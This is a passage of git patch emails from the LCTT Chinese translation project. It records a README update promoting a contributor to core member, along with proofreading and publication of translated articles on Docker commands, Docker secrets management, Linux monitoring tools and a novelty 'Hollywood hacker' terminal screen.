Subject: [PATCH 254/371] =?UTF-8?q?=E6=8F=90=E5=8D=87=20lujun9972=20?=
=?UTF-8?q?=E4=B8=BA=E6=A0=B8=E5=BF=83=E6=88=90=E5=91=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@lujun9972 恭喜,辛苦了! 请阅读
https://github.com/LCTT/TranslateProject/blob/master/core.md 了解 core
成员准则。
---
README.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 970a67dab0..c7cadf8293 100644
--- a/README.md
+++ b/README.md
@@ -61,6 +61,7 @@ LCTT 的组成
* 2017/03/16 提升 GHLandy、bestony、rusking 为新的 Core 成员。创建 Comic 小组。
* 2017/04/11 启用头衔制,为各位重要成员颁发头衔。
* 2017/11/21 鉴于 qhwdw 快速而上佳的翻译质量,提升 qhwdw 为新的 Core 成员。
+* 2018/01/11 提升 lujun9972 成为核心成员,并加入选题组。
核心成员
-------------------------------
@@ -88,6 +89,7 @@ LCTT 的组成
- 核心成员 @ucasFL,
- 核心成员 @rusking,
- 核心成员 @qhwdw,
+- 核心成员 @lujun9972
- 前任选题 @DeadFire,
- 前任校对 @reinoir222,
- 前任校对 @PurlingNayuki,
From 40f5b26760e7ef779983141e0bb5d8e121fe55ab Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:37:10 +0800
Subject: [PATCH 255/371] =?UTF-8?q?=E6=9B=B4=E6=96=B0?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index c7cadf8293..5b790c6f2a 100644
--- a/README.md
+++ b/README.md
@@ -61,6 +61,7 @@ LCTT 的组成
* 2017/03/16 提升 GHLandy、bestony、rusking 为新的 Core 成员。创建 Comic 小组。
* 2017/04/11 启用头衔制,为各位重要成员颁发头衔。
* 2017/11/21 鉴于 qhwdw 快速而上佳的翻译质量,提升 qhwdw 为新的 Core 成员。
+* 2017/11/19 wxy 在上海交大举办的 2017 中国开源年会上做了演讲:《[如何以翻译贡献参与开源社区](https://linux.cn/article-9084-1.html)》。
* 2018/01/11 提升 lujun9972 成为核心成员,并加入选题组。
核心成员
From c32f41577b3e3918bbb41abecd7acf52feebb72b Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 20:44:49 +0800
Subject: [PATCH 256/371] PRF&PUB:20170426 Important Docker commands for
Beginners.md
@lujun9972
---
...Important Docker commands for Beginners.md | 39 ++++++++-----------
1 file changed, 17 insertions(+), 22 deletions(-)
rename {translated/tech => published}/20170426 Important Docker commands for Beginners.md (79%)
diff --git a/translated/tech/20170426 Important Docker commands for Beginners.md b/published/20170426 Important Docker commands for Beginners.md
similarity index 79%
rename from translated/tech/20170426 Important Docker commands for Beginners.md
rename to published/20170426 Important Docker commands for Beginners.md
index 3bd079de0c..c3065ae6a4 100644
--- a/translated/tech/20170426 Important Docker commands for Beginners.md
+++ b/published/20170426 Important Docker commands for Beginners.md
@@ -1,6 +1,7 @@
为小白准备的重要 Docker 命令说明
======
-在早先的教程中,我们学过了[在 RHEL\ CentOS 7 上安装 Docker 并创建 docker 容器 .][1] 在本教程中,我们会学习管理 docker 容器的其他命令。
+
+在早先的教程中,我们学过了[在 RHEL CentOS 7 上安装 Docker 并创建 docker 容器][1]。 在本教程中,我们会学习管理 docker 容器的其他命令。
### Docker 命令语法
@@ -61,7 +62,7 @@ volume Manage Docker volumes
wait Block until a container stops, then print its exit code
```
-要进一步查看某个 command 支持的选项,运行
+要进一步查看某个命令支持的选项,运行:
```
$ docker docker-subcommand info
@@ -77,7 +78,7 @@ $ docker docker-subcommand info
$ docker run hello-world
```
-结果应该是,
+结果应该是:
```
Hello from Docker.
@@ -95,17 +96,17 @@ This message shows that your installation appears to be working correctly.
$ docker search Ubuntu
```
-我们应该会得到 age 可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方的镜像,经检查 `official` 这一列上是否为 `[OK]`。
+我们应该会得到可用的 Ubuntu 镜像的列表。记住,如果你想要的是官方的镜像,请检查 `official` 这一列上是否为 `[OK]`。
### 下载镜像
-一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它,
+一旦搜索并找到了我们想要的镜像,我们可以运行下面语句来下载它:
```
$ docker pull Ubuntu
```
-要查看所有已下载的镜像,运行
+要查看所有已下载的镜像,运行:
```
$ docker images
@@ -113,17 +114,17 @@ $ docker images
### 运行容器
-使用已下载镜像来运行容器,使用下面命令
+使用已下载镜像来运行容器,使用下面命令:
```
$ docker run -it Ubuntu
```
-这里,使用 '-it' 会打开一个 shell 与容器交互。容器启动并运行后,我们就可以像普通机器那样来使用它了,我们可以在容器中执行任何命令。
+这里,使用 `-it` 会打开一个 shell 与容器交互。容器启动并运行后,我们就可以像普通机器那样来使用它了,我们可以在容器中执行任何命令。
### 显示所有的 docker 容器
-要列出所有 docker 容器,运行
+要列出所有 docker 容器,运行:
```
$ docker ps
@@ -133,7 +134,7 @@ $ docker ps
### 停止 docker 容器
-要停止 docker 容器,运行
+要停止 docker 容器,运行:
```
$ docker stop container-id
@@ -141,7 +142,7 @@ $ docker stop container-id
### 从容器中退出
-要从容器中退出,执行
+要从容器中退出,执行:
```
$ exit
@@ -149,25 +150,19 @@ $ exit
### 保存容器状态
-容器运行并更改后后(比如安装了 apache 服务器),我们可以保存容器状态。这会在本地系统上保存新创建镜像。
+容器运行并更改后(比如安装了 apache 服务器),我们可以保存容器状态。这会在本地系统上保存新创建镜像。
-运行下面语句来提交并保存容器状态
+运行下面语句来提交并保存容器状态:
```
$ docker commit 85475ef774 repository/image_name
```
-这里,**commit** 会保存容器状态
-
- **85475ef774**,是容器的容器 id,
-
- **repository**,通常为 docker hub 上的用户名 (或者新加的仓库名称)
-
- **image_name**,新镜像的名称
+这里,`commit` 命令会保存容器状态,`85475ef774`,是容器的容器 id,`repository`,通常为 docker hub 上的用户名 (或者新加的仓库名称)`image_name`,是新镜像的名称。
我们还可以使用 `-m` 和 `-a` 来添加更多信息。通过 `-m`,我们可以留个信息说 apache 服务器已经安装好了,而 `-a` 可以添加作者名称。
- **像这样**
+像这样:
```
docker commit -m "apache server installed"-a "Dan Daniels" 85475ef774 daniels_dan/Cent_container
@@ -182,7 +177,7 @@ via: http://linuxtechlab.com/important-docker-commands-beginners/
作者:[Shusain][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From aad5ca686adc3df0203daa9312c5111c9b453801 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 21:03:39 +0800
Subject: [PATCH 257/371] PRF:20170915 Fake A Hollywood Hacker Screen in Linux
Terminal.md
@Drshu
---
...llywood Hacker Screen in Linux Terminal.md | 35 ++++++++-----------
1 file changed, 15 insertions(+), 20 deletions(-)
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
index 89d0d17196..d9f7a28ae1 100644
--- a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
+++ b/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
@@ -1,16 +1,13 @@
-
-
-# 在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+在 Linux 的终端上伪造一个好莱坞黑客的屏幕
+=============
摘要:这是一个简单的小工具,可以把你的 Linux 终端变为好莱坞风格的黑客入侵的实时画面。
-
-
-我进去了!
+我攻进去了!
你可能会几乎在所有的好莱坞电影里面会听说过这句话,此时的荧幕正在显示着一个入侵的画面。那可能是一个黑色的终端伴随着 ASCII 码、图标和连续不断变化的十六进制编码以及一个黑客正在击打着键盘,仿佛他/她正在打一段愤怒的论坛回复。
-但是那是好莱坞大片!黑客们想要在几分钟之内破解进入一个网络系统除非他花费了几个月的时间来研究它。但是一会儿我将会在旁边留下好莱坞黑客的指责。
+但是那是好莱坞大片!黑客们想要在几分钟之内破解进入一个网络系统除非他花费了几个月的时间来研究它。不过现在我先把对好莱坞黑客的评论放在一边。
因为我们将会做相同的事情,我们将会伪装成为一个好莱坞风格的黑客。
@@ -18,17 +15,16 @@
![在 Linux 上的Hollywood 入侵终端][1]
-看到了吗?就像这样,它甚至在后台播放了一个 Mission Impossible 主题的音乐。此外每次运行这个工具,你都可以获得一个全新且随机的入侵终端
+看到了吗?就像这样,它甚至在后台播放了一个 Mission Impossible 主题的音乐。此外每次运行这个工具,你都可以获得一个全新且随机的入侵的终端。
让我们看看如何在 30 秒之内成为一个好莱坞黑客。
-
### 如何安装 Hollywood 入侵终端在 Linux 之上
-这个工具非常适合叫做 Hollywood 。从根本上说,它运行在 Byobu ——一个基于 Window Manager 的文本,而且它会创建随机数量随机尺寸的分屏,并在上面运行混乱的文字应用。
+这个工具非常适合叫做 Hollywood 。从根本上说,它运行在 Byobu ——一个基于文本的窗口管理器,而且它会创建随机数量、随机尺寸的分屏,并在每个里面运行一个混乱的文字应用。
-Byobu 是一个在 Ubuntu 上由Dustin Kirkland 开发的有趣工具。在其他文章之中还有更多关于它的有趣之处,让我们专心的安装这个工具。
+[Byobu][2] 是一个在 Ubuntu 上由 Dustin Kirkland 开发的有趣工具。在其他文章之中还有更多关于它的有趣之处,让我们先专注于安装这个工具。
Ubuntu 用户可以使用简单的命令安装 Hollywood:
@@ -36,7 +32,7 @@ Ubuntu 用户可以使用简单的命令安装 Hollywood:
sudo apt install hollywood
```
-如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint, elementary OS, Zorin OS, Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
+如果上面的命令不能在你的 Ubuntu 或其他例如 Linux Mint、elementary OS、Zorin OS、Linux Lite 等等基于 Ubuntu 的 Linux 发行版上运行,你可以使用下面的 PPA 来安装:
```
sudo apt-add-repository ppa:hollywood/ppa
@@ -44,17 +40,17 @@ sudo apt-get update
sudo apt-get install byobu hollywood
```
-你也可以在它的 GitHub 仓库之中获得其源代码:
-
-[Hollywood 在 GitHub][3]
+你也可以在它的 GitHub 仓库之中获得其源代码: [Hollywood 在 GitHub][3] 。
一旦安装好,你可以使用下面的命令运行它,不需要使用 sudo :
-`hollywood`
+```
+hollywood
+```
-因为它会先运行 Byosu ,你将不得不使用 Ctrl+C 两次并再使用 `exit` 命令来停止显示入侵终端的脚本。
+因为它会先运行 Byosu ,你将不得不使用 `Ctrl+C` 两次并再使用 `exit` 命令来停止显示入侵终端的脚本。
-这是一个伪装好莱坞入侵的视频。订阅我们的 YouTube 频道看更多关于 Linux 的有趣视频。
+这里面有一个伪装好莱坞入侵的视频。 https://youtu.be/15-hMt8VZ50
这是一个让你朋友、家人和同事感到吃惊的有趣小工具,甚至你可以在酒吧里给女孩们留下深刻的印象,尽管我不认为这对你在那方面有任何的帮助,
@@ -63,14 +59,13 @@ sudo apt-get install byobu hollywood
如果你知道更多有趣的工具,可以在下面的评论栏里分享给我们。
-
------
via: https://itsfoss.com/hollywood-hacker-screen/
作者:[Abhishek Prakash][a]
译者:[Drshu](https://github.com/Drshu)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From cfb5cf733c084df465bf3bc069deca9920453877 Mon Sep 17 00:00:00 2001
From: wxy
Date: Thu, 11 Jan 2018 21:07:48 +0800
Subject: [PATCH 258/371] PUB:20170915 Fake A Hollywood Hacker Screen in Linux
Terminal.md
@Drshu https://linux.cn/article-9228-1.html
---
.../20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md (100%)
diff --git a/translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md b/published/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
similarity index 100%
rename from translated/tech/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
rename to published/20170915 Fake A Hollywood Hacker Screen in Linux Terminal.md
From 8034ab457a51648a9704c012c2f2656eec6644d6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 21:58:21 +0800
Subject: [PATCH 259/371] update
---
...toring Tools Every SysAdmin Should Know.md | 70 +++++++++++++++++--
1 file changed, 66 insertions(+), 4 deletions(-)
diff --git a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
index 0f8e48c826..bb527d5519 100644
--- a/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
+++ b/sources/tech/20090627 30 Linux System Monitoring Tools Every SysAdmin Should Know.md
@@ -15,6 +15,8 @@ top command display Linux processes. It provides a dynamic real-time view of a r
![](https://www.cyberciti.biz/tips/wp-content/uploads/2009/06/top-Linux-monitoring-command.jpg)
+Fig.01: Linux top command
+
#### Commonly Used Hot Keys With top Linux monitoring tools
Here is a list of useful hot keys:
@@ -172,15 +174,23 @@ To turn on extra full mode (it will show command line arguments passed to proces
#### Try To Display Only The Process IDs of Lighttpd
-`# ps -C lighttpd -o pid=`
+```
+# ps -C lighttpd -o pid=
+```
OR
-`# pgrep lighttpd`
+```
+# pgrep lighttpd
+```
OR
-`# pgrep -u vivek php-cgi`
+```
+# pgrep -u vivek php-cgi
+```
#### Print The Name of PID 55977
-`# ps -p 55977 -o comm=`
+```
+# ps -p 55977 -o comm=
+```
#### Top 10 Memory Consuming Process
@@ -206,6 +216,11 @@ Mem: 12302896 9739664 2563232 0 523124 5154740
Swap: 1052248 0 1052248
```
+1. [Linux Find Out Virtual Memory PAGESIZE][50]
+2. [Linux Limit CPU Usage Per Process][51]
+3. [How much RAM does my Ubuntu / Fedora Linux desktop PC have?][52]
+
+
### 7. iostat - Montor Linux average CPU load and disk activity
iostat command report Central Processing Unit (CPU) statistics and input/output statistics for devices, partitions and network filesystems (NFS).
@@ -247,6 +262,10 @@ Linux 2.6.18-128.1.14.el5 (www03.nixcraft.in) 06/26/2009
Average: all 2.02 0.00 0.27 0.01 0.00 97.70
```
++ [How to collect Linux system utilization data into a file][53]
++ [How To Create sar Graphs With kSar To Identifying Linux Bottlenecks][54]
+
+
### 9. mpstat - Monitor multiprocessor usage on Linux
mpstat command displays activities for each available processor, processor 0 being the first one. mpstat -P ALL to display average CPU utilization per processor:
@@ -331,6 +350,10 @@ Show all TCP sockets with process SELinux security contexts:
`# ss -t -a -Z `
See the following resources about ss and netstat commands:
++ [ss: Display Linux TCP / UDP Network and Socket Information][56]
++ [Get Detailed Information About Particular IP address Connections Using netstat Command][57]
+
+
### 13. iptraf - Get real-time network statistics on Linux
iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others. It can provide the following info in easy to read format:
@@ -343,8 +366,12 @@ iptraf command is interactive colorful IP LAN monitor. It is an ncurses-based IP
![Fig.02: General interface statistics: IP traffic statistics by network interface ][9]
+Fig.02: General interface statistics: IP traffic statistics by network interface
+
![Fig.03 Network traffic statistics by TCP connection][10]
+Fig.03 Network traffic statistics by TCP connection
+
[Install IPTraf on a Centos / RHEL / Fedora Linux To Get Network Statistics][11]
### 14. tcpdump - Detailed network traffic analysis
@@ -365,6 +392,7 @@ Use [wireshark to view detailed][12] information about files, enter:
iotop command monitor, I/O usage information, using the Linux kernel. It shows a table of current I/O usage sorted by processes or threads on the server.
`$ sudo iotop`
Sample outputs:
+
![iotop monitoring linux disk read write IO][13]
[Linux iotop: Check What's Stressing And Increasing Load On Your Hard Disks][14]
@@ -377,12 +405,19 @@ Sample outputs:
![htop process viewer for Linux][15]
+[CentOS / RHEL: Install htop An Interactive Text-mode Process Viewer][58]
+
+
### 17. atop - Advanced Linux system & process monitor
atop is a very powerful and an interactive monitor to view the load on a Linux system. It displays the most critical hardware resources from a performance point of view. You can quickly see CPU, memory, disk and network performance. It shows which processes are responsible for the indicated load concerning CPU and memory load on a process level.
`$ atop`
+
![atop Command Line Tools to Monitor Linux Performance][16]
+[CentOS / RHEL: Install atop (Advanced System & Process Monitor) Utility][59]
+
+
### 18. ac and lastcomm -
You must monitor process and login activity on your Linux server. The psacct or acct package contains several utilities for monitoring process activities, including:
@@ -400,10 +435,12 @@ You must monitor process and login activity on your Linux server. The psacct or
Monit is a free and open source software that acts as process supervision. It comes with the ability to restart services which have failed. You can use Systemd, daemontools or any other such tool for the same purpose. [This tutorial shows how to install and configure monit as Process supervision on Debian or Ubuntu Linux][19].
+
### 20. nethogs- Find out PIDs that using most bandwidth on Linux
NetHogs is a small but handy net top tool. It groups bandwidth by process name such as Firefox, wget and so on. If there is a sudden burst of network traffic, start NetHogs. You will see which PID is causing bandwidth surge.
`$ sudo nethogs`
+
![nethogs linux monitoring tools open source][20]
[Linux: See Bandwidth Usage Per Process With Nethogs Tool][21]
@@ -412,18 +449,26 @@ NetHogs is a small but handy net top tool. It groups bandwidth by process name s
iftop command listens to network traffic on a given interface name such as eth0. [It displays a table of current bandwidth usage by pairs of host][22]s.
`$ sudo iftop`
+
![iftop in action][23]
### 22. vnstat - A console-based network traffic monitor
vnstat is easy to use console-based network traffic monitor for Linux. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
`$ vnstat `
+
![vnstat linux network traffic monitor][25]
++ [Keeping a Log Of Daily Network Traffic for ADSL or Dedicated Remote Linux Server][60]
++ [CentOS / RHEL: Install vnStat Network Traffic Monitor To Keep a Log Of Daily Traffic][61]
++ [CentOS / RHEL: View Vnstat Graphs Using PHP Web Interface Frontend][62]
+
+
### 23. nmon - Linux systems administrator, tuner, benchmark tool
nmon is a Linux sysadmin's ultimate tool for the tunning purpose. It can show CPU, memory, network, disks, file systems, NFS, top process resources and partition information from the cli.
`$ nmon`
+
![nmon command][26]
[Install and Use nmon Tool To Monitor Linux Systems Performance][27]
@@ -432,6 +477,7 @@ nmon is a Linux sysadmin's ultimate tool for the tunning purpose. It can show CP
glances is an open source cross-platform monitoring tool. It provides tons of information on the small screen. It can also work in client/server mode.
`$ glances`
+
![Glances][28]
[Linux: Keep An Eye On Your System With Glances Monitor][29]
@@ -464,6 +510,8 @@ KSysguard is a network enabled task and system monitor application for KDE deskt
![Fig.05 KDE System Guard][35]
+Fig.05 KDE System Guard {Image credit: Wikipedia}
+
See [the KSysguard handbook][36] for detailed usage.
### 30. Gnome Linux system monitor
@@ -486,6 +534,8 @@ The System Monitor application enables you to display basic system information a
![Fig.06 The Gnome System Monitor application][37]
+Fig.06 The Gnome System Monitor application
+
### Bonus: Additional Tools
A few more tools:
@@ -564,3 +614,15 @@ via: https://www.cyberciti.biz/tips/top-linux-monitoring-tools.html
[45]:https://twitter.com/nixcraft
[46]:https://facebook.com/nixcraft
[47]:https://plus.google.com/+CybercitiBiz
+[50]:https://www.cyberciti.biz/faq/linux-check-the-size-of-pagesize/
+[51]:https://www.cyberciti.biz/faq/cpu-usage-limiter-for-linux/
+[52]:https://www.cyberciti.biz/tips/how-much-ram-does-my-linux-system.html
+[53]:https://www.cyberciti.biz/tips/howto-write-system-utilization-data-to-file.html
+[54]:https://www.cyberciti.biz/tips/identifying-linux-bottlenecks-sar-graphs-with-ksar.html
+[56]:https://www.cyberciti.biz/tips/linux-investigate-sockets-network-connections.html
+[57]:https://www.cyberciti.biz/tips/netstat-command-tutorial-examples.html
+[58]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[59]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-atop-command-using-yum/
+[60]:https://www.cyberciti.biz/tips/linux-display-bandwidth-usage-on-network-interface-by-host.html
+[61]:https://www.cyberciti.biz/faq/centos-redhat-fedora-linux-install-vnstat-bandwidth-monitor/
+[62]:https://www.cyberciti.biz/faq/centos-redhat-fedora-linux-vnstat-php-webinterface-frontend-config/
From 5d78ff3354d2664498f382825127ece11f52c104 Mon Sep 17 00:00:00 2001
From: imquanquan
Date: Thu, 11 Jan 2018 22:28:23 +0800
Subject: [PATCH 260/371] checked by imquanquan
---
...9 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 32 +++++++++----------
1 file changed, 16 insertions(+), 16 deletions(-)
diff --git a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
index 0fca78a76f..183e2ef7e3 100644
--- a/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
+++ b/translated/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md
@@ -1,42 +1,42 @@
-Dockers 涉密数据(Secrets) 管理介绍
+Dockers 涉密信息(Secrets)管理介绍
====================================
容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
-构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据分发功能。
+构建更安全的应用程序的一个关键因素是与系统和其他应用程序进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密信息。我们很高兴可以推出 Docker 涉密信息,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密信息分发功能。
-有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
+有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密信息分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密信息管理不善的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密信息到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
-### Docker 涉密数据(Secrets) 管理介绍
+### Docker 涉密信息(Secrets)管理介绍
-根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。
+根本上我们认为,如果有一个标准的接口来访问涉密信息,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密信息进行加密;在空余的时候也对涉密数据进行加密;防止涉密信息在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密信息,不能多也不能不少。
-通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。
+通过将涉密信息整合到 Docker 的业务流程,我们能够在遵循这些确切的原则下为涉密信息的管理问题提供一种解决方案。
-下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。
+下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密信息对象,安全地传递给我们的容器。
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
-在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密数据加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
+在 Docker 中,一个涉密信息是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密信息加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
```
$ echo "This is a secret" | docker secret create my_secret_data -
```
-一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。
+一旦,涉密信息到达某个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有把任何涉密信息数据永久写入未加密的磁盘。向内部存储写入涉密信息,赋予了涉密信息跟其他集群数据一样的高可用性。
-当集群管理器启动的时,包含 涉密数据 的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,将且会在管理器启动的时候被使用。
+当集群管理器启动的时,包含涉密信息的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传递,将且会在管理器启动的时候使用。
-当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
+当授予新创建或运行的服务权限访问某个涉密信息权限时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
```
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
```
-未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。
+未加密的涉密信息被挂载到一个容器,该容器位于 `/run/secrets/` 的内存文件系统中。
```
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
@@ -44,7 +44,7 @@ total 4
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
```
-如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。
+如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密信息的节点,这些节点将不再有权访问该应用程序的涉密信息。
```
$ docker service update --secret-rm="my_secret_data" redis
@@ -54,7 +54,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret
cat: can't open '/run/secrets/my_secret_data': No such file or directory
```
-查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
+查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密信息。同时,特别推荐 Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和使这一特性成为现实的团队。
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
@@ -65,7 +65,7 @@ cat: can't open '/run/secrets/my_secret_data': No such file or directory
### 通过 Docker 更安全地使用应用程序
-Docker 涉密数据旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密数据安全又能仅在当被需要涉密数据操作的确切容器需要的使用的容器结构。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密数据,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
+Docker 涉密信息旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是是首个被设计为既能保持涉密信息安全,并且仅在特定的容器需要它来进行必要的涉密信息操作的时候使用。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密信息,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
更多相关学习资源:
@@ -85,7 +85,7 @@ via: https://blog.docker.com/2017/02/docker-secrets-management/
作者:[ Ying Li][a]
译者:[HardworkFish](https://github.com/HardworkFish)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[imquanquan](https://github.com/imquanquan)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From edd0131b3007da453617e8976bc79bab5a13c566 Mon Sep 17 00:00:00 2001
From: imquanquan
Date: Thu, 11 Jan 2018 22:38:40 +0800
Subject: [PATCH 261/371] checked by imquanquan
---
.../20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
